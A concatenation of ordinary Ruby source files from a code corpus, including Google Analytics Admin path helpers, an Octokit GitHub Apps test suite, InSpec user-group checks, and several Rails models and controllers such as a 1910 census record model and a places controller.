#
# @return [::String]
def conversion_event_path property:, conversion_event:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/conversionEvents/#{conversion_event}"
end
##
# Create a fully-qualified CustomDimension resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/customDimensions`
#
# @param property [String]
#
# @return [::String]
def custom_dimension_path property:
"properties/#{property}/customDimensions"
end
##
# Create a fully-qualified CustomMetric resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/customMetrics`
#
# @param property [String]
#
# @return [::String]
def custom_metric_path property:
"properties/#{property}/customMetrics"
end
##
# Create a fully-qualified DataRetentionSettings resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataRetentionSettings`
#
# @param property [String]
#
# @return [::String]
def data_retention_settings_path property:
"properties/#{property}/dataRetentionSettings"
end
##
# Create a fully-qualified DataSharingSettings resource string.
#
# The resource will be in the following format:
#
# `accounts/{account}/dataSharingSettings`
#
# @param account [String]
#
# @return [::String]
def data_sharing_settings_path account:
"accounts/#{account}/dataSharingSettings"
end
##
# Create a fully-qualified DataStream resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataStreams/{data_stream}`
#
# @param property [String]
# @param data_stream [String]
#
# @return [::String]
def data_stream_path property:, data_stream:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/dataStreams/#{data_stream}"
end
##
# Create a fully-qualified DisplayVideo360AdvertiserLink resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/displayVideo360AdvertiserLinks/{display_video_360_advertiser_link}`
#
# @param property [String]
# @param display_video_360_advertiser_link [String]
#
# @return [::String]
def display_video360_advertiser_link_path property:, display_video_360_advertiser_link:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/displayVideo360AdvertiserLinks/#{display_video_360_advertiser_link}"
end
##
# Create a fully-qualified DisplayVideo360AdvertiserLinkProposal resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/displayVideo360AdvertiserLinkProposals/{display_video_360_advertiser_link_proposal}`
#
# @param property [String]
# @param display_video_360_advertiser_link_proposal [String]
#
# @return [::String]
def display_video360_advertiser_link_proposal_path property:, display_video_360_advertiser_link_proposal:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/displayVideo360AdvertiserLinkProposals/#{display_video_360_advertiser_link_proposal}"
end
##
# Create a fully-qualified FirebaseLink resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/firebaseLinks/{firebase_link}`
#
# @param property [String]
# @param firebase_link [String]
#
# @return [::String]
def firebase_link_path property:, firebase_link:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/firebaseLinks/#{firebase_link}"
end
##
# Create a fully-qualified GlobalSiteTag resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataStreams/{data_stream}/globalSiteTag`
#
# @param property [String]
# @param data_stream [String]
#
# @return [::String]
def global_site_tag_path property:, data_stream:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/dataStreams/#{data_stream}/globalSiteTag"
end
##
# Create a fully-qualified GoogleAdsLink resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/googleAdsLinks/{google_ads_link}`
#
# @param property [String]
# @param google_ads_link [String]
#
# @return [::String]
def google_ads_link_path property:, google_ads_link:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/googleAdsLinks/#{google_ads_link}"
end
##
# Create a fully-qualified GoogleSignalsSettings resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/googleSignalsSettings`
#
# @param property [String]
#
# @return [::String]
def google_signals_settings_path property:
"properties/#{property}/googleSignalsSettings"
end
##
# Create a fully-qualified MeasurementProtocolSecret resource string.
#
# The resource will be in the following format:
#
# `properties/{property}/dataStreams/{data_stream}/measurementProtocolSecrets/{measurement_protocol_secret}`
#
# @param property [String]
# @param data_stream [String]
# @param measurement_protocol_secret [String]
#
# @return [::String]
def measurement_protocol_secret_path property:, data_stream:, measurement_protocol_secret:
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
raise ::ArgumentError, "data_stream cannot contain /" if data_stream.to_s.include? "/"
"properties/#{property}/dataStreams/#{data_stream}/measurementProtocolSecrets/#{measurement_protocol_secret}"
end
##
# Create a fully-qualified Property resource string.
#
# The resource will be in the following format:
#
# `properties/{property}`
#
# @param property [String]
#
# @return [::String]
def property_path property:
"properties/#{property}"
end
##
# Create a fully-qualified UserLink resource string.
#
# @overload user_link_path(account:, user_link:)
# The resource will be in the following format:
#
# `accounts/{account}/userLinks/{user_link}`
#
# @param account [String]
# @param user_link [String]
#
# @overload user_link_path(property:, user_link:)
# The resource will be in the following format:
#
# `properties/{property}/userLinks/{user_link}`
#
# @param property [String]
# @param user_link [String]
#
# @return [::String]
def user_link_path **args
resources = {
"account:user_link" => (proc do |account:, user_link:|
raise ::ArgumentError, "account cannot contain /" if account.to_s.include? "/"
"accounts/#{account}/userLinks/#{user_link}"
end),
"property:user_link" => (proc do |property:, user_link:|
raise ::ArgumentError, "property cannot contain /" if property.to_s.include? "/"
"properties/#{property}/userLinks/#{user_link}"
end)
}
resource = resources[args.keys.sort.join(":")]
raise ::ArgumentError, "no resource found for values #{args.keys}" if resource.nil?
resource.call(**args)
end
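            # Illustrative calls for the two overloads above (identifiers are
            # placeholder values, not from the original source):
            #
            #   user_link_path account: "100", user_link: "200"
            #   # => "accounts/100/userLinks/200"
            #   user_link_path property: "300", user_link: "200"
            #   # => "properties/300/userLinks/200"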
extend self
end
end
end
end
end
end
| 36.682848 | 123 | 0.550243 |
e2bedae09bae22b4745cff21fe956018876ec858 | 421 | class User < ActiveRecord::Base
# Include default devise modules.
# notice that :omniauthable is not included in this block
# notice that :confirmable is not included in this block
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable
# note that this include statement comes AFTER the devise block above
include DeviseTokenAuth::Concerns::User
end
| 38.272727 | 71 | 0.764846 |
11671c65fc6ff1b7fcef30e8ed636637eee44a54 | 15,113 | require 'helper'
describe Octokit::Client::Apps do
before(:each) do
Octokit.reset!
@client = oauth_client
@jwt_client = Octokit::Client.new(:bearer_token => new_jwt_token)
use_vcr_placeholder_for(@jwt_client.bearer_token, '<JWT_BEARER_TOKEN>')
end
after(:each) do
Octokit.reset!
end
describe ".app", :vcr do
it "returns current App" do
response = @jwt_client.app()
expect(response.id).not_to be_nil
assert_requested :get, github_url("/app")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/app")
response = client.app()
assert_requested request
end
end
describe ".find_integration_installations", :vcr do
it "returns installations for an integration" do
allow(@jwt_client).to receive(:octokit_warn)
installations = @jwt_client.find_integration_installations
expect(installations).to be_kind_of Array
assert_requested :get, github_url("/app/installations")
expect(@jwt_client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .find_integration_installations
describe ".find_app_installations", :vcr do
it "returns installations for an app" do
installations = @jwt_client.find_app_installations()
expect(installations).to be_kind_of Array
assert_requested :get, github_url("/app/installations")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/app/installations")
response = client.find_app_installations()
assert_requested request
end
end # .find_app_installations
describe ".find_user_installations", :vcr do
it "returns installations for a user" do
response = @client.find_user_installations()
expect(response.total_count).not_to be_nil
expect(response.installations).to be_kind_of(Array)
assert_requested :get, github_url("/user/installations")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/user/installations")
response = client.find_user_installations()
assert_requested request
end
it "allows auto_pagination", :vcr do
@client.auto_paginate = true
response = @client.find_user_installations(per_page: 1)
expect(response.total_count).to eq 2
expect(response.installations.count).to eq 2
expect(response.installations).to be_kind_of(Array)
end
end # .find_user_installations
describe ".find_organization_installation", :vcr do
let(:organization) { test_github_org }
it "returns installation for an organization" do
response = @jwt_client.find_organization_installation(organization)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
assert_requested :get, github_url("/orgs/#{organization}/installation")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/organizations/1234/installation")
response = client.find_organization_installation(1234)
assert_requested request
end
it "allows auto_pagination" do
@jwt_client.auto_paginate = true
response = @jwt_client.find_organization_installation(organization, per_page: 1)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
end
end # .find_organization_installation
describe ".find_repository_installation", :vcr do
it "returns installation for an repository" do
response = @jwt_client.find_repository_installation(@test_org_repo)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
assert_requested :get, github_url("/repos/#{@test_org_repo}/installation")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/repos/testing/1234/installation")
response = client.find_repository_installation('testing/1234')
assert_requested request
end
it "allows auto_pagination" do
@jwt_client.auto_paginate = true
response = @jwt_client.find_repository_installation(@test_org_repo, per_page: 1)
expect(response.id).not_to be_nil
expect(response.target_type).to eq("Organization")
end
end # .find_repository_installation
describe ".find_user_installation", :vcr do
let(:user) { test_github_login }
it "returns installation for a user" do
response = @jwt_client.find_user_installation(user)
expect(response.id).not_to be_nil
expect(response.account.login).to eq(user)
assert_requested :get, github_url("/users/#{user}/installation")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/users/1234/installation")
response = client.find_user_installation('1234')
assert_requested request
end
it "allows auto_pagination" do
@jwt_client.auto_paginate = true
response = @jwt_client.find_user_installation(user, per_page: 1)
expect(response.id).not_to be_nil
expect(response.account.login).to eq(user)
end
end # .find_user_installation
context "with app installation", :vcr do
let(:installation) { test_github_integration_installation }
describe ".installation" do
it "returns the installation" do
response = @jwt_client.installation(installation)
expect(response).to be_kind_of Sawyer::Resource
assert_requested :get, github_url("/app/installations/#{installation}")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/app/installations/1234")
response = client.installation(1234)
assert_requested request
end
end # .installation
describe ".find_installation_repositories_for_user" do
it "returns repositories for a user" do
response = @client.find_installation_repositories_for_user(installation)
expect(response.total_count).not_to be_nil
expect(response.repositories).to be_kind_of(Array)
assert_requested :get, github_url("/user/installations/#{installation}/repositories")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/user/installations/1234/repositories")
response = client.find_installation_repositories_for_user(1234)
assert_requested request
end
it "allows auto_pagination", :vcr do
@client.auto_paginate = true
response = @client.find_installation_repositories_for_user(installation, per_page: 1)
expect(response.total_count).to eq 2
expect(response.repositories.count).to eq 2
expect(response.repositories).to be_kind_of(Array)
end
end # .find_installation_repositories_for_user
describe ".create_integration_installation_access_token" do
it "creates an access token for the installation" do
allow(@jwt_client).to receive(:octokit_warn)
response = @jwt_client.create_integration_installation_access_token(installation)
expect(response).to be_kind_of(Sawyer::Resource)
expect(response.token).not_to be_nil
expect(response.expires_at).not_to be_nil
assert_requested :post, github_url("/app/installations/#{installation}/access_tokens")
expect(@jwt_client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .create_integration_installation_access_token
describe ".create_app_installation_access_token" do
it "creates an access token for the installation" do
response = @jwt_client.create_app_installation_access_token(installation)
expect(response).to be_kind_of(Sawyer::Resource)
expect(response.token).not_to be_nil
expect(response.expires_at).not_to be_nil
assert_requested :post, github_url("/app/installations/#{installation}/access_tokens")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
path = "app/installations/1234/access_tokens"
request = stub_post("https://ghe.local/api/v3/#{path}")
response = client.create_app_installation_access_token(1234)
assert_requested request
end
end # .create_app_installation_access_token
describe ".delete_installation" do
it "deletes an installation" do
response = @jwt_client.delete_installation(installation, accept: Octokit::Preview::PREVIEW_TYPES[:uninstall_github_app])
expect(response).to be_truthy
end
end # .delete_installation
context "with app installation access token" do
let(:installation_client) do
token = @jwt_client.create_app_installation_access_token(installation).token
use_vcr_placeholder_for(token, '<INTEGRATION_INSTALLATION_TOKEN>')
Octokit::Client.new(:access_token => token)
end
let(:ghe_installation_client) do
Octokit::Client.new \
access_token: "v1.1f699f1069f60xxx",
api_endpoint: "https://ghe.local/api/v3"
end
describe ".list_integration_installation_repositories" do
it "lists the installations repositories" do
allow(installation_client).to receive(:octokit_warn)
response = installation_client.list_integration_installation_repositories()
expect(response.total_count).not_to be_nil
expect(response.repositories).to be_kind_of(Array)
expect(installation_client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .list_integration_installation_repositories
describe ".list_app_installation_repositories" do
it "lists the installations repositories" do
response = installation_client.list_app_installation_repositories()
expect(response.total_count).not_to be_nil
expect(response.repositories).to be_kind_of(Array)
end
it "works for GitHub Enterprise installs" do
request = stub_get("https://ghe.local/api/v3/installation/repositories")
response = ghe_installation_client.list_app_installation_repositories()
assert_requested request
end
it "allows auto_pagination", :vcr do
installation_client.auto_paginate = true
response = installation_client.list_app_installation_repositories({per_page: 1})
expect(response.total_count).to eq 2
expect(response.repositories.count).to eq 2
expect(response.repositories).to be_kind_of(Array)
end
end # .list_app_installation_repositories
end # with app installation access token
context "with repository" do
let(:repository) { test_org_repo }
before(:each) do
@repo = @client.create_repository(
"#{test_github_repository}_#{Time.now.to_f}",
:organization => test_github_org
)
end
after(:each) do
@client.delete_repository(@repo.full_name)
end
describe ".add_repository_to_integration_installation" do
it "adds the repository to the installation" do
allow(@client).to receive(:octokit_warn)
response = @client.add_repository_to_integration_installation(installation, @repo.id)
expect(response).to be_truthy
expect(@client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .add_repository_to_integration_installation
describe ".add_repository_to_app_installation" do
it "adds the repository to the installation" do
response = @client.add_repository_to_app_installation(installation, @repo.id)
expect(response).to be_truthy
end
end # .add_repository_to_app_installation
context 'with installed repository on installation' do
before(:each) do
@client.add_repository_to_app_installation(installation, @repo.id)
end
describe ".remove_repository_from_integration_installation" do
it "removes the repository from the installation" do
allow(@client).to receive(:octokit_warn)
response = @client.remove_repository_from_integration_installation(installation, @repo.id)
expect(response).to be_truthy
expect(@client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .remove_repository_from_integration_installation
describe ".remove_repository_from_app_installation" do
it "removes the repository from the installation" do
response = @client.remove_repository_from_app_installation(installation, @repo.id)
expect(response).to be_truthy
end
end # .remove_repository_from_app_installation
end # with installed repository on installation
end # with repository
context "with repository on GitHub Enterprise" do
let(:ghe_client) do
Octokit::Client.new \
access_token: "x" * 40,
api_endpoint: "https://ghe.local/api/v3"
end
describe ".add_repository_to_app_installation" do
it "works for GitHub Enterprise installs" do
request = stub_put("https://ghe.local/api/v3/user/installations/1234/repositories/1234")
response = ghe_client.add_repository_to_app_installation(1234, 1234)
assert_requested request
end
end # .add_repository_to_app_installation
describe ".remove_repository_from_app_installation" do
it "works for GitHub Enterprise installs" do
request = stub_delete("https://ghe.local/api/v3/user/installations/1234/repositories/1234")
response = ghe_client.remove_repository_from_app_installation(1234, 1234)
assert_requested request
end
end # .remove_repository_from_app_installation
end # with repository on GitHub Enterprise
end # with app installation
end
| 37.224138 | 128 | 0.701383 |
7a5d0cd47bf065c09118572268f0bb971755ce97 | 1,190 | require "spec_helper"
require "core_ext/hash_replace_key"
RSpec.describe HashReplaceKey do
describe "#replace_key" do
it "replaces a key with a given replacement and returns a new hash" do
original = { foo: "bar" }
new_hash = original.replace_key(:foo, :baz)
expect(new_hash).to include(baz: "bar")
expect(new_hash).not_to include(foo: "bar")
expect(original.object_id).not_to eq(new_hash.object_id)
end
end
describe "#replace_key!" do
it "replaces a key with a given replacement in place" do
original = { foo: "bar" }
new_hash = original.replace_key!(:foo, :baz)
expect(new_hash).to include(baz: "bar")
expect(new_hash).not_to include(foo: "bar")
expect(original.object_id).to eq(new_hash.object_id)
end
it "does nothing if the original key is missing" do
original = { foo: "bar" }
      new_hash = original.replace_key!(:baz, :boo)
expect(original).to eq(new_hash)
end
it "copies nil values where the key is present" do
original = { bar: nil }
new_hash = original.replace_key!(:bar, :another)
expect(new_hash).to include(another: nil)
end
end
end
| 26.444444 | 74 | 0.660504 |
1a672c410dea637750b23c8b75acf46120b794ef | 1,032 | #
# Project:: Ansible Role - Linux Users
#
# Copyright 2020, Route 1337, LLC, All Rights Reserved.
#
# Maintainers:
# - Matthew Ahrenstein: [email protected]
#
# See LICENSE
#
# Prereqs tests
if ['ubuntu', 'centos'].include?(os[:name])
# Verify zsh is installed
describe package('zsh') do
it { should be_installed }
end
# Verify the sysadmins group exists
describe group('sysadmins') do
it { should exist }
its('gid') { should eq 1337}
end
# Verify the sysusers group exists
describe group('sysusers') do
it { should exist }
its('gid') { should eq 8737}
end
# Verify the svcaccounts group exists
describe group('svcaccounts') do
it { should exist }
its('gid') { should eq 7782}
end
# Verify sysadmins and svcaccounts have password-less sudo and sysusers do not get mentioned
describe file('/etc/sudoers') do
its('content') { should match /%sysadmins ALL=\(ALL\) NOPASSWD: ALL/ }
its('content') { should_not match /sysusers/ }
end
else
# Do nothing
end
| 21.5 | 94 | 0.670543 |
ffc87de98d2f1195e767251b3e510d73b1eddf22 | 222 | require_relative './deploy/logger'
require_relative './deploy/aws'
require_relative '../tasks/task_builder'
module Deploy
def logger(file = 'log/deploy.log')
Logger.logger(file)
end
module_function :logger
end
| 18.5 | 40 | 0.747748 |
87bc689ecfea40c867cba654548f8dac9cab90d2 | 524 | require 'spec_helper'
describe DeleteClassificationWorker do
it 'deletes the classification if it exists' do
workflow = create :workflow
subject = create :subject
classification = create :classification, workflow: workflow, subject: subject
described_class.new.perform(classification.id)
expect(Classification.find_by_id(classification.id)).to be_nil
end
it 'does nothing if the classification is gone' do
expect do
described_class.new.perform(-1)
end.not_to raise_error
end
end
| 27.578947 | 81 | 0.755725 |
1c26512224db743fc409153533e7828ca8f84558 | 1,852 | class TasksController < ApplicationController
before_action :set_task, only: [ :show, :update, :destroy ]
def index
tasks = TaskBlueprint.render Task.sorted
render json: tasks
end
def show
render json: TaskBlueprint.render(@task, view: :extended)
end
def create
    @task = Task.new(task_params)
    if @task.save
render json: TaskBlueprint.render(@task), status: :created
else
render json: { errors: @task.errors.full_messages }, status: :bad_request
end
end
def update
if @task.update(task_params)
render json: TaskBlueprint.render(@task)
else
render json: { errors: @task.errors.full_messages }, status: :bad_request
end
end
def update_order
task = Task.find(params[:task_id])
old_status_id = task.status_id
    task.update(task_params)
begin
task_ids = task_order_params[:ids_in_order]
tasks = Task.where(id: task_ids).order(:order)
      # check for extra ids sent down that don't match any known task
      ids_difference = task_ids - tasks.pluck(:id)
      if ids_difference.length > 0
        raise "Unknown task id detected"
      end
# TODO: check for id not sent in ids_in_order
      tasks.each do |t|
        t.update(order: task_ids.find_index(t.id))
      end
render json: tasks.reload.map {|task| TaskBlueprint.render(task) }
    rescue StandardError => e
task.update(status_id: old_status_id) # revert any potential status change
render json: e, status: :bad_request
end
end
def destroy
@task.destroy
render status: :no_content
end
private
def task_params
params.require(:task).permit(:id, :uid, :title, :description, :task_id, :project_id, :status_id, :priority, :order)
end
def task_order_params
params.permit(ids_in_order: [])
end
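  # Assumed reorder payload shape, inferred from the two permit lists above
  # (route name and values are illustrative only):
  #
  #   PATCH /tasks/:task_id/update_order
  #   { "task": { "status_id": 2 }, "ids_in_order": [12, 7, 3] }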
def set_task
@task = Task.find(params[:id])
end
end
| 25.722222 | 119 | 0.675486 |
2624d01cf0143c551d3ab1e0f7ad65c8c2dad24f | 1,214 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::MediaServices::Mgmt::V2019_05_01_preview
module Models
#
# The LiveEvent action input parameter definition.
#
class LiveEventActionInput
include MsRestAzure
# @return [Boolean] The flag indicates if remove LiveOutputs on Stop.
attr_accessor :remove_outputs_on_stop
#
# Mapper for LiveEventActionInput class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'LiveEventActionInput',
type: {
name: 'Composite',
class_name: 'LiveEventActionInput',
model_properties: {
remove_outputs_on_stop: {
client_side_validation: true,
required: false,
serialized_name: 'removeOutputsOnStop',
type: {
name: 'Boolean'
}
}
}
}
}
end
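      # Illustrative round-trip under the mapper above (values are ours):
      #
      #   input = LiveEventActionInput.new
      #   input.remove_outputs_on_stop = true
      #   # serializes to { "removeOutputsOnStop" => true }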
end
end
end
| 26.391304 | 75 | 0.582372 |
6199699787216c992534742a8d198dff23ed0fa5 | 796 | # Uncomment this if you reference any of your controllers in activate
# require_dependency 'application'
class FlashContentExtension < Radiant::Extension
version "0.1"
description "Adds tags to make it easier to embed Adobe Flash content"
url "http://github.com/ceaser/radiant-flash_content-extension"
# define_routes do |map|
# map.connect 'admin/flash_content/:action', :controller => 'admin/flash_content'
# end
def activate
begin
return if ActiveRecord::Migrator.current_version == 0
rescue
return
end
Page.send :include, FlashContentTags
Radiant::Config["flash_content.required_version"] = "9.0.0" if Radiant::Config["flash_content.required_version"].nil?
end
def deactivate
# admin.tabs.remove "Flash Content"
end
end | 27.448276 | 121 | 0.722362 |
28ac102db5f06a02cc87505039b378254d1c32e1 | 149 | class CreateUserBadges < ActiveRecord::Migration
def change
create_table :user_badges do |t|
t.timestamps null: false
end
end
end
| 16.555556 | 48 | 0.711409 |
0391a5f1ac7ac3d979f0b462073f3b2c624b4d16 | 4,484 | # encoding: UTF-8
require 'minitest/autorun'
require 'yaml'
require 'big_query'
require 'pry-byebug'
module BigQuery
class Client
attr_accessor :client
end
end
class BigQueryTest < MiniTest::Unit::TestCase
def setup
@bq = BigQuery::Client.new(config)
if @bq.tables_formatted.include? 'test'
@bq.delete_table('test')
end
result = @bq.create_table('test', id: { type: 'INTEGER', mode: 'REQUIRED' }, type: { type: 'STRING', mode: 'NULLABLE' })
end
def config
return @config if @config
    config_data = File.expand_path(File.dirname(__FILE__) + "/../.bigquery_settings.yml")
@config = YAML.load_file(config_data)
end
def test_faraday_option_config
assert_equal @bq.client.connection.options.timeout, 999
end
def test_for_tables
table = @bq.tables.select{|t| t['id'] == "#{config['project_id']}:#{config['dataset']}.test"}.first
assert_equal table['kind'], "bigquery#table"
assert_equal table['tableReference']['tableId'], 'test'
end
def test_for_tables_formatted
result = @bq.tables_formatted
assert_includes result, 'test'
end
def test_for_table_data
result = @bq.table_data('test')
assert_kind_of Array, result
end
def test_for_create_table
if @bq.tables_formatted.include? 'test123'
@bq.delete_table('test123')
end
schema = {
id: { type: 'INTEGER'},
city: {
name:"city",
type:"RECORD",
mode: "nullable",
fields: {
id: {name:"id", type:"INTEGER" },
name: {name:"name", type:"STRING" },
country: { name:"country", type:"STRING" },
time: { name:"time", type:"TIMESTAMP" }
}
}
}
result = @bq.create_table('test123', schema)
assert_equal result['kind'], "bigquery#table"
assert_equal result['tableReference']['tableId'], "test123"
assert_equal result['schema']['fields'], [
{"name"=>"id", "type"=>"INTEGER"},
{
"name"=>"city",
"type"=>"RECORD",
"fields"=>[
{"name"=>"id", "type"=>"INTEGER"},
{"name"=>"name", "type"=>"STRING"},
{"name"=>"country", "type"=>"STRING"},
{"name"=>"time", "type"=>"TIMESTAMP"}
]
}
]
end
def test_for_delete_table
if [email protected]_formatted.include? 'test123'
@bq.create_table('test123', id: { type: 'INTEGER' })
end
result = @bq.delete_table('test123')
tables = @bq.tables_formatted
refute_includes tables, 'test123'
end
def test_for_describe_table
result = @bq.describe_table('test')
assert_equal result['kind'], "bigquery#table"
assert_equal result['type'], "TABLE"
assert_equal result['id'], "#{config['project_id']}:#{config['dataset']}.test"
assert_equal result['tableReference']['tableId'], 'test'
assert_equal result['schema']['fields'][0]['name'], 'id'
assert_equal result['schema']['fields'][0]['type'], 'INTEGER'
assert_equal result['schema']['fields'][0]['mode'], 'REQUIRED'
assert_equal result['schema']['fields'][1]['name'], 'type'
assert_equal result['schema']['fields'][1]['type'], 'STRING'
assert_equal result['schema']['fields'][1]['mode'], 'NULLABLE'
end
def test_for_query
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1")
assert_equal result['kind'], "bigquery#queryResponse"
assert_equal result['jobComplete'], true
end
def test_for_query_useQueryCache
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1", useQueryCache: true)
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1", useQueryCache: true)
assert_equal result['cacheHit'], true
end
def test_for_query_dryRun
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1", dryRun: true)
assert_equal result['jobReference']['jobId'], nil
end
def test_for_insert
result = @bq.insert('test' ,"id" => 123, "type" => "Task")
assert_equal result['kind'], "bigquery#tableDataInsertAllResponse"
end
def test_for_insert_array
data = [
{"id" => 123, "type" => "Task"},
{"id" => 321, "type" => "Other task"}
]
result = @bq.insert('test' , data)
assert_equal result['kind'], "bigquery#tableDataInsertAllResponse"
end
def test_for_insert_job
result = @bq.insert_job(query: {query: "SELECT * FROM [#{config['dataset']}.test] LIMIT 1"})
assert_equal result['kind'], "bigquery#job"
end
end
| 28.201258 | 124 | 0.624665 |
6a711c17af4db3919d4314a206e586aadd2b9acf | 406 | module Diversities
class ReligionForm < Form
RELIGION = ["no-religion",
"christian-including-church-of-england-catholic-protestant-and-all-other-christian-denominations",
"buddhist", "hindu", "jewish", "muslim", "sikh",
"prefer-not-to-say", "any-other-religion"].freeze
attribute :religion, :string
attribute :religion_text, :string
end
end
| 33.833333 | 114 | 0.64532 |
ff0cd8c57f2b874823b9c73494232efeccbc34a1 | 2,084 | # frozen_string_literal: true
# Model class for 1910 US Census records.
class Census1910Record < CensusRecord
self.table_name = 'census_1910_records'
alias_attribute :profession, :occupation
belongs_to :locality, inverse_of: :census1910_records
validates :language_spoken, vocabulary: { name: :language, allow_blank: true }
validates :mother_tongue, :mother_tongue_father, :mother_tongue_mother, vocabulary: { name: :language, allow_blank: true }
validates :dwelling_number, presence: true
auto_strip_attributes :industry, :employment
define_enumeration :race, %w[W B Mu Ch Jp In Ot]
define_enumeration :marital_status, %w[S M_or_M1 M2_or_M3 Wd D]
def year
1910
end
COLUMNS = {
street_house_number: '2nd Column on the Left',
street_prefix: '1st Column on the Left',
street_name: '1st Column on the Left',
street_suffix: '1st Column on the Left',
dwelling_number: 1,
family_id: 2,
last_name: 3,
first_name: 3,
middle_name: 3,
name_prefix: 3,
name_suffix: 3,
relation_to_head: 4,
race: 6,
sex: 5,
age: 7,
age_months: 7,
marital_status: 8,
years_married: 9,
num_children_born: 10,
num_children_alive: 11,
pob: 12,
mother_tongue: 12,
pob_father: 13,
mother_tongue_father: 13,
pob_mother: 14,
mother_tongue_mother: 14,
year_immigrated: 15,
naturalized_alien: 16,
language_spoken: 17,
occupation: 18,
industry: 19,
employment: 20,
unemployed: 21,
unemployed_weeks_1909: 22,
can_read: 23,
can_write: 24,
attended_school: 25,
owned_or_rented: 26,
mortgage: 27,
farm_or_house: 28,
num_farm_sched: 29,
civil_war_vet: 30,
blind: 31,
dumb: 32
}.freeze
IMAGES = {
page_number: '1910/sheet-side.png',
page_side: '1910/sheet-side.png',
ward: '1910/sheet-side.png',
enum_dist: '1910/sheet-side.png',
first_name: '1910/names.png',
middle_name: '1910/names.png',
last_name: '1910/names.png',
civil_war_vet: '1910/punch-card-symbols.png'
}.freeze
end
| 25.108434 | 124 | 0.681862 |
6a0260025206103e0de7d0e235c0a256bc9329e3 | 153 | # frozen_string_literal: true
class ETL::PersonSyncer < ETL::Syncer
def origin_class
::Person
end
def target_class
ETL::Person
end
end
| 12.75 | 37 | 0.705882 |
f7f10674a828e5dee544d44e11939603235b3644 | 1,637 | class PlacesController < ApplicationController
def index
@places = Place.all.paginate(:page => params[:page])
end
def show
@place = Place.find(params[:id])
end
# def new
# @place = Place.new
# end
# def create
# @place = Place.new(place_params)
# if @place.save
# redirect_to @place
# else
# render 'new'
# end
# end
# def edit
# @place = Place.find(params[:id])
# end
# def update
# @place = Place.find(params[:id])
# if @place.update_attributes(place_params)
# redirect_to @place
# else
# render 'edit'
# end
# end
def filter_hoteles
@places = Place.where("categoria like '%otel%'").paginate(:page => params[:page])
render 'index'
end
def filter_hostales
@places = Place.where("categoria like '%ostal%'").paginate(:page => params[:page])
render 'index'
end
def filter_albergues
@places = Place.where("categoria like '%lberg%'").paginate(:page => params[:page])
render 'index'
end
def filter_pensiones
@places = Place.where("categoria like '%ensi%'").paginate(:page => params[:page])
render 'index'
end
def filter_aparts
@places = Place.where("categoria like '%partam%'").paginate(:page => params[:page])
render 'index'
end
def filter_campings
@places = Place.where("categoria like '%amping%'").paginate(:page => params[:page])
render 'index'
end
def mapa
@places = Place.all
render 'mapa'
end
private
def place_params
    params.require(:place).permit(:name, :address, :postal, :phone, :email, :url, :accesibilidad, :comment, :categoria, :habitaciones, :camas, :latitude, :longitude, :img)
end
end
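# The filter actions above share one pattern: a SQL LIKE fragment over
# `categoria`, so '%otel%' matches both "Hotel" and "Hoteles". A hypothetical
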